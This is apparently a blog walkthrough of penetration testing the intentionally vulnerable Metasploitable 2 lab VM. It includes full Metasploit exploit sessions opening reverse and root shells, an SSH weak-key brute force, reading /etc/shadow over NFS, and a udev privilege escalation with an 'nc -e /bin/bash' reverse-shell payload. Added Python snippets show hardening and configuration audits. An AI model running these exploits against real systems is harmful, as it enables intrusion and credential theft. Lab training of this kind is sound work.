Core dump overflow

Core dump in progress...

Pentest lab - Metasploitable 2


Today I will walk through different ways of exploiting Metasploitable 2, the newer release of Rapid7’s popular vulnerable machine. First, what is Metasploitable?

Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.

In my lab environment, the IP of the attacker machine is 192.168.127.159, and the victim machine is 192.168.127.154.

Since this is a test lab, I won’t be concerned about stealth. Instead, I will try to get the most information out of the scans.

Let’s start by port scanning the target with nmap. I did a full-port, aggressive scan against the target. Here are the results.

nmap -p1-65535 -A 192.168.127.154

Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-03 21:33 EEST
Nmap scan report for 192.168.127.154
Host is up (0.00047s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45+00:00
|_Not valid after:  2010-04-16T13:07:45+00:00
|_ssl-date: 2014-06-03T18:35:26+00:00; -1s from local time.
53/tcp    open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Metasploitable2 - Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      46385/tcp  mountd
|   100005  1,2,3      47809/udp  mountd
|   100021  1,3,4      47120/udp  nlockmgr
|   100021  1,3,4      53013/tcp  nlockmgr
|   100024  1          34130/tcp  status
|_  100024  1          45305/udp  status
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  tcpwrapped
1099/tcp  open  java-rmi    Java RMI Registry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      46385/tcp  mountd
|   100005  1,2,3      47809/udp  mountd
|   100021  1,3,4      47120/udp  nlockmgr
|   100021  1,3,4      53013/tcp  nlockmgr
|   100024  1          34130/tcp  status
|_  100024  1          45305/udp  status
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: ConnectWithDatabase, SwitchToSSLAfterHandshake, Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SupportsCompression, LongColumnFlag
|   Status: Autocommit
|_  Salt: (eFoz:O^m'yLR5Qw&RJ\
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    Unknown security type (33554432)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         Unreal ircd
| irc-info: 
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   servers: 1
|   users: 1
|   lservers: 0
|   lusers: 1
|   uptime: 0 days, 0:07:28
|   source host: 7FA0EA81.B1DFC955.FFFA6D49.IP
|_  source ident: nmap
6697/tcp  open  irc         Unreal ircd
8009/tcp  open  ajp13?
| ajp-auth: 
|_  ERROR: Failed to connect to AJP server
| ajp-methods: 
|_  ERROR: Failed to connect to server
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34130/tcp open  status      1 (RPC #100024)
46385/tcp open  mountd      1-3 (RPC #100005)
50867/tcp open  unknown
53013/tcp open  nlockmgr    1-4 (RPC #100021)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      46385/tcp  mountd
|   100005  1,2,3      47809/udp  mountd
|   100021  1,3,4      47120/udp  nlockmgr
|   100021  1,3,4      53013/tcp  nlockmgr
|   100024  1          34130/tcp  status
|_  100024  1          45305/udp  status
MAC Address: 00:0C:29:2E:6D:70 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP
|_  System time: 2014-06-03T14:35:26-04:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 192.168.127.154

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 284.64 seconds

Ok, there are plenty of services just waiting for our attention. So let’s check each port and see what we get.

Port 21 vsftpd

There is an exploit available in Metasploit for the vsftpd version.

msf > search vsftpd

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution

The description from Rapid7 site:

VSFTPD v2.3.4 Backdoor Command Execution

This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

Let’s leverage it and get a shell:

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   Name               Disclosure Date  Rank    Description
   ----               ---------------  ----    -----------
   cmd/unix/interact                   normal  Unix Command, Interact with Established Connection

msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.127.154  yes       The target address
   RPORT  21               yes       The target port


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.127.159:57936 -> 192.168.127.154:6200) at 2014-06-03 22:42:36 +0300

whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Aaand we own the machine! Now let’s move on.

Port 22 ssh

The OpenSSL package installed on the system is vulnerable to a brute-force attack on its keys due to a random number generator weakness. Here’s the overview and the CVE number:

CVE-2008-0166

OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.

I chose the following Ruby exploit:

http://www.exploit-db.com/exploits/5632/

Before running it, you have to download the precalculated vulnerable keys from:

http://www.exploit-db.com/sploits/debian_ssh_dsa_1024_x86.tar.bz2 # for dsa keys

http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 # for rsa keys

Then I ran the script as follows:

ruby ./5632.rb 192.168.127.154 root ~/rsa/2048/

You can consult the source for more information. Basically, the script checks whether the root account has a weak SSH key by trying each key in the directory where you placed the keys. On a hit, you will see something like this:

KEYFILE FOUND:
57c3115d77c56390332dc5c49978627a-5429

After finding the key, you can use it to log in as root via ssh:

ssh -l root -p 22 -i 57c3115d77c56390332dc5c49978627a-5429 192.168.127.154

Port 23 telnet

For this one I used an auxiliary module:

msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > show options

Module options (auxiliary/scanner/telnet/telnet_version):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     23               yes       The target port
   THREADS   1                yes       The number of concurrent threads
   TIMEOUT   30               yes       Timeout for the Telnet probe
   USERNAME                   no        The username to authenticate as

msf auxiliary(telnet_version) > set RHOSTS 192.168.127.154
RHOSTS => 192.168.127.154
msf auxiliary(telnet_version) > run

[*] 192.168.127.154:23 TELNET _                  _       _ _        _     _      ____  \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_|                                          \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So now we know the credentials for the msfadmin account, and if you log in and play around you will find that this account has sudo privileges, so it’s possible to run commands as root.

Port 80 apache

Navigating to the root of the web server, we can see some vulnerable web applications, along with the msfadmin account details which we got earlier with telnet. I won’t go over the web applications here, because I am focusing on host based exploitation in this post. However, I found out that I could use Metasploit against one of them to get a shell, so I will detail that here.

The Nessus scan revealed that the TWiki web application is vulnerable to remote code execution. I found the following suitable exploit:

TWiki History TWikiUsers rev Parameter Command Execution

This module exploits a vulnerability in the history component of TWiki. By passing a ‘rev’ parameter containing shell metacharacters to the TWikiUsers script, an attacker can execute arbitrary OS commands.

msf > use exploit/unix/webapp/twiki_history
msf exploit(twiki_history) > show options

Module options (exploit/unix/webapp/twiki_history):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST                     yes       The target address
   RPORT    80               yes       The target port
   URI      /twiki/bin       yes       TWiki bin directory path
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(twiki_history) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(twiki_history) > set payload cmd/unix/reverse 
payload => cmd/unix/reverse
msf exploit(twiki_history) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ZeiYbclsufvu4LGM;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Successfully sent exploit request
[*] Reading from socket B
[*] B: "ZeiYbclsufvu4LGM\r\n"
[*] Matching...
[*] A is input...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo D0Yvs2n6TnTUDmPF;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:54381) at 2014-06-08 17:31:48 +0300
[*] Reading from socket B
[*] B: "D0Yvs2n6TnTUDmPF\r\n"
[*] Matching...
[*] A is input...

whoami
www-data

This is a low privilege shell, but we can escalate to root via the udev exploit, as shown later.

Port 445 samba

First, I’ll use an auxiliary module to get the server’s version:

msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_version) > set RHOSTS 192.168.127.154
RHOSTS => 192.168.127.154
msf auxiliary(smb_version) > run

[*] 192.168.127.154:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

With that information in hand, we can now use a suitable exploit against the target:

Samba “username map script” Command Execution

This module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default “username map script” configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!

msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(usermap_script) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.127.154  yes       The target address
   RPORT  139              yes       The target port


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(usermap_script) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(usermap_script) > set RPORT 445
RPORT => 445
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo f8rjvIDZRdKBtu0F;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "f8rjvIDZRdKBtu0F\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:46653) at 2014-06-04 22:23:23 +0300

whoami
root
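The TWiki ‘rev’ parameter bug and the Samba “username map script” bug share one root cause: an attacker-controlled string is pasted into a command line that a shell then interprets. The following is an added example, not code from the original post or from either project, that shows the vulnerable pattern beside its hardened form. The helper command is assumed to be `echo` so the difference is visible without any real mapping script.

```python
import re
import subprocess

# Assumed stand-in for the external helper a server would call with the username
# (Samba's "username map script", TWiki's history handler). It just echoes back.
MAP_COMMAND = "echo"


def map_username_vulnerable(username):
    """Vulnerable pattern: the untrusted value is interpolated into a shell command
    line, so shell metacharacters inside it become additional commands."""
    result = subprocess.run(f"{MAP_COMMAND} {username}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


# Allow-list for the values a username may legitimately take.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,32}$")


def map_username_hardened(username):
    """Hardened pattern: reject anything outside the allow-list, then run the helper
    with an argv list and no shell, so the value is always exactly one argument."""
    if not USERNAME_RE.match(username):
        raise ValueError(f"rejected username: {username!r}")
    result = subprocess.run([MAP_COMMAND, username], capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    benign = "msfadmin"
    # Constructed input: a metacharacter followed by a harmless second command,
    # the same shape as the flaws described above without a real payload.
    hostile = "msfadmin; echo INJECTED"
    print(map_username_vulnerable(benign), end="")    # msfadmin
    print(map_username_vulnerable(hostile), end="")   # msfadmin, then INJECTED
    try:
        map_username_hardened(hostile)
    except ValueError as err:
        print("hardened:", err)
```

Validation alone is not enough if the value is still handed to a shell; the argv-style call is what removes the shell from the path.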

Port 514 tcpwrapped

The nmap scan revealed the port is open but it’s tcpwrapped. Let’s first see what that means:

TCP Wrapper is a host-based networking access control list system, used to filter network access to Internet Protocol servers on (Unix-like) operating systems such as Linux or BSD. (Wikipedia)

So we can conclude the port is protected by TCP Wrapper. If we try to netcat to the port, we see this:

nc -vvn 192.168.127.154 514

(UNKNOWN) [192.168.127.154] 514 (shell) open

I ran a Nessus scan against the target, and according to the report, a critical vulnerability is present on this port:

rsh Unauthenticated Access (via finger Information)

Synopsis

It was possible to log on to this machine without a password.

Description

Using common usernames as well as the usernames reported by ‘finger’, Nessus was able to log in through rsh. Either the accounts are not protected by passwords or the ~/.rhosts files are not configured properly.

This vulnerability is confirmed to exist in Cisco Prime LAN Management Solution, but could be present on any host that is not securely configured.

Port
tcp/514

So all we have to do is log in via the remote shell program:

rsh 192.168.127.154

Last login: Wed May  7 11:00:37 EDT 2014 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~#
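The Nessus finding says the cause is either password-less accounts or badly configured ~/.rhosts files. A defender can audit the trust files that rshd and rlogind consult. The following is an added example, not code from the original post: it parses constructed /etc/hosts.equiv and .rhosts samples and flags the entries that grant password-less remote login. The sample contents are made up for the example; the rule that hosts.equiv is never consulted for root, so any /root/.rhosts entry is a direct root trust, is standard r-services behaviour.

```python
# Constructed samples of the r-services trust files (host [user] per line).
SAMPLE_FILES = {
    "/etc/hosts.equiv": "+ +\n",              # any host, any user: the worst case
    "/root/.rhosts": "192.168.127.159\n",     # one host, same username (root)
    "/home/msfadmin/.rhosts": "# nothing trusted\n",
}


def parse_trust_file(text):
    """Return (host, user) entries from a hosts.equiv or .rhosts file; user may be None."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        entries.append((parts[0], parts[1] if len(parts) > 1 else None))
    return entries


def audit_trust(files):
    """Return (path, message) findings for entries that allow password-less rsh/rlogin."""
    findings = []
    for path, text in files.items():
        for host, user in parse_trust_file(text):
            if host == "+":
                findings.append((path, "any host trusted (+)"))
            if user == "+":
                findings.append((path, "any remote user trusted (+)"))
            if path == "/root/.rhosts":
                # hosts.equiv does not apply to root; this file alone grants root trust.
                findings.append((path, f"password-less root login from {host}"))
            elif host != "+" and user not in (None, "+"):
                findings.append((path, f"user {user} from {host} may log in as this account"))
    return findings


if __name__ == "__main__":
    for path, msg in audit_trust(SAMPLE_FILES):
        print(f"{path}: {msg}")
```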

Port 1099 java-rmi

Let’s continue our exploitation. Anything labeled Java is bound to be interesting from a security perspective :)

Searching for Java exploits yielded something interesting:

Java RMI Server Insecure Default Configuration Java Code Execution

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

msf > use exploit/multi/misc/java_rmi_server  
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    1099             yes       The target port
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)

msf exploit(java_rmi_server) > set RHOST 192.168.127.154
RHOST => 192.168.127.154

msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.127.154  yes       The target address
   RPORT    1099             yes       The target port
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(java_rmi_server) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(java_rmi_server) > exploit

[*] Started reverse handler on 192.168.127.159:4444 
[*] Using URL: http://0.0.0.0:8080/oVUJAkfU
[*]  Local IP: http://192.168.127.159:8080/oVUJAkfU
[*] Connected and sending request for http://192.168.127.159:8080/oVUJAkfU/WAHKp.jar
[*] 192.168.127.154  java_rmi_server - Replied to request for payload JAR
[*] Sending stage (30355 bytes) to 192.168.127.154
[*] Meterpreter session 2 opened (192.168.127.159:4444 -> 192.168.127.154:36965) at 2014-06-04 22:42:17 +0300
[+] Target 192.168.127.154:1099 may be exploitable...
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > 

Port 1524 shell

Well, not much to say here. There’s already a nice, cozy shell waiting for connections, so nothing extra needs to be done.

Port 2049 nfs

Let’s use the showmount command to see the NFS server’s export list. This command displays mount information for an NFS server; the -e flag shows the exports:

showmount -e 192.168.127.154

Export list for 192.168.127.154:
/ *

How nice! The root directory is shared. So, let’s mount it then:

mkdir /metafs # this will be the mount point

mount -t nfs 192.168.127.154:/ /metafs -o nolock # mount the remote shared directory as nfs and disable file locking

Now we can read the passwords and everything else:

cat /metafs/etc/shadow

root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
..........etc..........
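The export list `/ *` is the whole problem here: the root filesystem is exported to every host. The following is an added example, not code from the original post: it parses /etc/exports syntax and flags the exports a defender should fix, with a weak line beside a corrected one. Both sample lines are constructed for the example; the page only shows showmount output, so the option set of the real export is an assumption.

```python
import re

# Constructed samples. The first reproduces the situation showmount reported
# above (root exported to every host); the second is a corrected export.
WEAK_EXPORTS = "/ *(rw,no_root_squash)\n"
FIXED_EXPORTS = "/srv/share 192.168.127.0/24(ro,root_squash,sync)\n"

EXPORT_RE = re.compile(r"^(\S+)(?:\s+(.*))?$")
# client[(opt,opt,...)] tokens separated by whitespace
CLIENT_RE = re.compile(r"(\S+?)(?:\((.*?)\))?(?:\s|$)")


def parse_exports(text):
    """Return [(path, [(client, {options}), ...]), ...] from /etc/exports text."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = EXPORT_RE.match(line)
        path, rest = m.group(1), m.group(2) or ""
        clients = []
        for cm in CLIENT_RE.finditer(rest):
            opts = {o.strip() for o in (cm.group(2) or "").split(",") if o.strip()}
            clients.append((cm.group(1), opts))
        exports.append((path, clients))
    return exports


def audit_exports(exports):
    """Return (path, message) findings for risky export entries."""
    findings = []
    for path, clients in exports:
        if not clients:
            findings.append((path, "no client list: exported to every host"))
        for client, opts in clients:
            if client == "*":
                findings.append((path, "exported to any host (*)"))
            if path == "/":
                findings.append((path, f"root filesystem exported to {client}"))
            if "no_root_squash" in opts:
                findings.append((path, f"no_root_squash for {client}: remote root keeps uid 0"))
            if "rw" in opts and client == "*":
                findings.append((path, "writable by any host"))
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_EXPORTS), ("fixed", FIXED_EXPORTS)):
        print(label, audit_exports(parse_exports(text)))
```

With root_squash in effect the client's root is mapped to an unprivileged uid, so a mode 0640 file like /etc/shadow would not be readable through the mount even if the export stayed open.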

Port 3306 mysql

The Nessus scan that I ran against the target revealed the following:

MySQL Unpassworded Account Check

Synopsis

The remote database server can be accessed without a password.

Description

It is possible to connect to the remote MySQL database server using an unpassworded account. This may allow an attacker to launch further attacks against the database.

The ‘root’ account does not have a password. Here is the list of databases on the remote server:
- information_schema
- dvwa
- metasploit
- mysql
- owasp10
- tikiwiki
- tikiwiki195

Let’s see if we can indeed connect to the database as root without a password:

mysql -u root -p -h 192.168.127.154
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 

Now we can look inside the databases and get any data that might interest us.

Port 3632 distccd

distccd is the server for the distcc distributed compiler. It accepts and runs compilation jobs for network clients. Metasploit has an exploit available for this:

DistCC Daemon Command Execution

This module uses a documented security weakness to execute arbitrary commands on any system running distccd.

msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3632             yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf exploit(distcc_exec) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(distcc_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.127.154  yes       The target address
   RPORT  3632             yes       The target port


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf exploit(distcc_exec) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(distcc_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo VhuwDGXAoBmUMNcg;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "VhuwDGXAoBmUMNcg\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:52283) at 2014-06-05 21:34:46 +0300

whoami
daemon

So we have a low privilege account. Time for some local privilege escalation. I will use this exploit: http://www.exploit-db.com/exploits/8572/

Description

udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space.

Usage

Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, usually the udevd PID minus 1) as argv[1].

The exploit will execute /tmp/run as root so throw whatever payload you want in there.

Ok, on the victim’s command line I looked for netcat and, fortunately, it’s installed:

whereis nc
nc: /bin/nc.traditional /bin/nc /usr/share/man/man1/nc.1.gz

So I will compile the exploit and send it over netcat. I am on 64-bit Kali and the target is 32-bit, so I compile it explicitly for 32-bit:

gcc -m32 8572.c -o 8572
nc -vv -l -p 5555 < 8572

From the victim, I go to the /tmp/ directory and grab the exploit from the attacking machine:

nc -v -n 192.168.127.159 5555 > 8572

Next, let’s look for the PID:

cat /proc/net/netlink

And the relevant line is:

sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
df8cc200 15  2767   00000001 0        0        00000000 2

Check that this is the correct PID by looking at the udev service:

ps aux | grep udev
root      2768  0.0  0.1   2092   620 ?        S<s  14:11   0:00 /sbin/udevd --daemon

It appears to be the right one (2768 – 1 = 2767).

Next, put a payload in /tmp/run, since that is what the exploit will execute. I will use netcat to connect back to the attacker machine and give it a shell:

echo '#!/bin/bash' > /tmp/run
echo 'nc -e /bin/bash 192.168.127.159 5555' >> /tmp/run

On the attacker machine, listen on port 5555:

nc -v -l -p 5555

And on the victim machine, now that all is set up, I just make the exploit executable and run it:

chmod +x 8572
./8572 2767

Now check our local netcat listener for the root shell:

nc: connect to 192.168.127.159 5555 from 192.168.127.154 (192.168.127.154) 35539 [35539]
whoami
root

A bit of effort on that one, but all the more rewarding! Let’s move on.

